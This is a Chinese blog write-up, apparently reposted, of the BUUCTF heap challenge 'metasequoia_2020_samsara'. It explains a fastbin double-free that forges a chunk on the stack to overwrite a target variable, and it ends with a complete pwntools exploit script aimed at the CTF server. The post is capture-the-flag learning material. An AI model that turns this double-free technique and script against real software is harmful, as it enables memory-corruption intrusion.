終于學(xué)到堆了，這道題做了三遍才來寫這篇博客，算是對題有了較深地體會吧。

堆題的變量確實比棧題要多啊。

觀察各個case部分：

思路

1.先malloc chunk0，1，2。先利用double free漏洞連續(xù)free兩個chunk 0，1，形成閉環(huán)

2.malloc 一個chunk，雖然是chunk 3 ，但由于閉環(huán)的關(guān)系，會把編號為0 的chunk地址給chunk 3，此時閉環(huán)狀態(tài)為：

3.從棧上偽造chunk

觀察源代碼，只要把v8得值改成3735928559即可。這時可以把下圖棧上的變量區(qū)想象成偽造的chunk。

4.鏈接chunk 3 和偽造的chunk

只要修改chunk 3的fd，使其指向上圖prevsize所在地址，就能把chunk 3 和棧鏈接在一起。
chunk 3 的fd如何更改？在源代碼的case 3部分，修改Ingredient就等于修改fd，因為malloc 一個chunk，返回地就是fd，所以一開始保存chunk的數(shù)組就是保存fd地址。（另外，free也是free的fd，但是一個chunk要鏈接另一個chunk，指向的必須是下一個chunk的prevsize地址。）
此時，閉環(huán)改變了：

5.修改偽造chunk

要修改偽造的chunk內(nèi)容，必須把它從fastbin中提取出來。前面有兩個chunk在排隊，所以一共要malloc 3次。
此時，偽造的chunk編號是6。只要把chunk 6的內(nèi)容修改成3735928559就可以了。

代碼

from pwn import * #context.log_level="debug" #p=process("./samsara") p=remote("node4.buuoj.cn",28335) def add():p.sendlineafter(">","1")def delete(index):p.sendlineafter(">","2")p.sendlineafter(":\n",index)def edit(index,content):p.sendlineafter(">","3")p.sendlineafter(":\n",index)p.sendlineafter(":\n",content)def show():p.sendlineafter(">","4")p.recvuntil("0x")return int(p.recvuntil("\n"),16) def edit_lair(value):p.sendlineafter(">","5")p.sendlineafter("?\n",value)add() #chunk 0 add() #chunk 1 add() #chunk 2delete("0") delete("1") delete("0")add() #chunk 3 edit_lair(str(0x20)) #v7=0x20edit("3",str(show()-0x8)) add() #chunk 4 add() #chunk 5 add() #chunk 6edit("6",str(3735928559))p.sendline("6")p.interactive()

干飯干飯！

總結(jié)

以上是生活随笔為你收集整理的BUUCTF刷题——metasequoia_2020_samsara的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。